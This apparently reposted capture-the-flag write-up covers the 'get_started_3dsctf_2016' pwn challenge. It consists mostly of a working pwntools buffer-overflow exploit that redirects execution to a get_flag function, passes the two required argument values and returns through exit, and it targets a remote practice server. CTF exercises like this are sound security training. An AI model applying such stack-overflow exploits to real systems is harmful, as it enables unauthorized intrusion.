pwn | get_started_3dsctf_2016
Author: Internet
get_started_3dsctf_2016
ret2text
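An annoying challenge: if the program terminates abnormally, nothing is echoed back, so you have to return into the exit function.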
exp:
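from pwn import *
context.log_level = 'debug'
sh = remote('node4.buuoj.cn', 25656)
p_getflag = 0x80489a0   # address of get_flag
p_main = 0x08048A20     # address of main (not used in the payload)
p_exit = 0x0804E6A0     # address of exit
# sh.recv(1024)
# Layout: 0x38 bytes of padding up to the saved return address, then get_flag,
# then exit as get_flag's return address (so the process ends normally),
# then the two values get_flag reads as its stack arguments.
payload = 0x38 * b'm' + p32(p_getflag) + p32(p_exit) + p32(0x308CD64F) + p32(0x195719D1)
sh.sendline(payload)
sh.interactive()
sh.close()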
Source: https://www.cnblogs.com/Mz1-rc/p/15568842.html